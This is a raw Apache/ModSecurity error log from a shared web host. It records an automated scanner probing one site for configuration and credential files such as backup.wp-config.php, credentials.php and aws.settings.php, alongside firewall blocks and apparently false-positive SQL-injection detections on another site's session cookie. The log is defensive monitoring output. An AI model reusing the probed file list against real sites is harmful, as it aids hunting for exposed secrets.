[Mon May 11 22:28:17.584057 2026] [security2:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "k06.fr"] [uri "/backup.wp-config.php"] [unique_id "agI74Xo_DFxNSZVmaX3RfgAAAMI"]
[Mon May 11 22:28:17.584238 2026] [security2:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "k06.fr"] [uri "/backup.wp-config.php"] [unique_id "agI74Xo_DFxNSZVmaX3RfgAAAMI"]
[Mon May 11 22:28:17.584455 2026] [security2:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "k06.fr"] [uri "/backup.wp-config.php"] [unique_id "agI74Xo_DFxNSZVmaX3RfgAAAMI"]
[Mon May 11 22:28:17.713855 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/20.php
[Mon May 11 22:28:17.715719 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI74Xo_DFxNSZVmaX3RegAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:17.823530 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/upload_file.php
[Mon May 11 22:28:17.925675 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/aws.settings.php
[Mon May 11 22:28:18.038543 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/payout.php
[Mon May 11 22:28:18.140791 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/pqr.php
[Mon May 11 22:28:18.248717 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/phpinfo.php
[Mon May 11 22:28:18.357709 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/tmp.php
[Mon May 11 22:28:18.490370 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/456.php
[Mon May 11 22:28:18.604764 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/new2.php
[Mon May 11 22:28:18.797491 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/server.php
[Mon May 11 22:28:18.930409 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/extension-info.php
[Mon May 11 22:28:19.034393 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/conn_test.php
[Mon May 11 22:28:19.150079 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/information.php
[Mon May 11 22:28:19.253289 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/credentials.php
[Mon May 11 22:28:19.363174 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/phphph.php
[Mon May 11 22:28:19.472929 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/test-cgi.php
[Mon May 11 22:28:19.651692 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI743o_DFxNSZVmaX3RkAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:19.651970 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI743o_DFxNSZVmaX3RkAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:20.048353 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/twin.php
[Mon May 11 22:28:20.266960 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI743o_DFxNSZVmaX3RkAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:20.639133 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/pi.php7
[Mon May 11 22:28:21.168967 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/display_phpinfo.php
[Mon May 11 22:28:21.268629 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/webserver-info.php
[Mon May 11 22:28:21.368220 2026] [security2:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "k06.fr"] [uri "/new-wp-config.php"] [unique_id "agI75Xo_DFxNSZVmaX3RlgAAAMI"]
[Mon May 11 22:28:21.368380 2026] [security2:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "k06.fr"] [uri "/new-wp-config.php"] [unique_id "agI75Xo_DFxNSZVmaX3RlgAAAMI"]
[Mon May 11 22:28:21.368608 2026] [security2:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "k06.fr"] [uri "/new-wp-config.php"] [unique_id "agI75Xo_DFxNSZVmaX3RlgAAAMI"]
[Mon May 11 22:28:21.439985 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI75Xo_DFxNSZVmaX3RlwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:21.440279 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI75Xo_DFxNSZVmaX3RlwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:21.471504 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/env-info.php
[Mon May 11 22:28:21.593106 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/moderator.php
[Mon May 11 22:28:21.705202 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/23.php
[Mon May 11 22:28:21.861253 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/summary.php
[Mon May 11 22:28:21.973044 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/globals.php
[Mon May 11 22:28:22.075664 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI75Xo_DFxNSZVmaX3RlwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:22.077505 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/evil.php
[Mon May 11 22:28:22.930097 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI75no_DFxNSZVmaX3RnwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:22.930390 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI75no_DFxNSZVmaX3RnwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:23.540090 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI75no_DFxNSZVmaX3RnwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:24.353991 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI76Ho_DFxNSZVmaX3RowAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:24.354283 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI76Ho_DFxNSZVmaX3RowAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:24.890483 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI76Ho_DFxNSZVmaX3RowAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:25.127739 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI76Xo_DFxNSZVmaX3RpQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:25.128021 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI76Xo_DFxNSZVmaX3RpQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:25.779290 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI76Xo_DFxNSZVmaX3RpQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:26.185751 2026] [authz_core:error] [pid 1606352:tid 1606420] [client 216.73.216.110:17790] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/cron/error_log
[Mon May 11 22:28:26.442098 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI76no_DFxNSZVmaX3RrAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:26.442411 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI76no_DFxNSZVmaX3RrAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:26.893208 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI76no_DFxNSZVmaX3RrAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:28.243820 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI77Ho_DFxNSZVmaX3RsgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:28.244106 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI77Ho_DFxNSZVmaX3RsgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:28.843368 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI77Ho_DFxNSZVmaX3RsgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:29.644468 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI77Xo_DFxNSZVmaX3RtQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:29.644779 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI77Xo_DFxNSZVmaX3RtQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:30.250562 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI77Xo_DFxNSZVmaX3RtQAAAMg"], referer: https://rentparadise.fr/wp-login.php
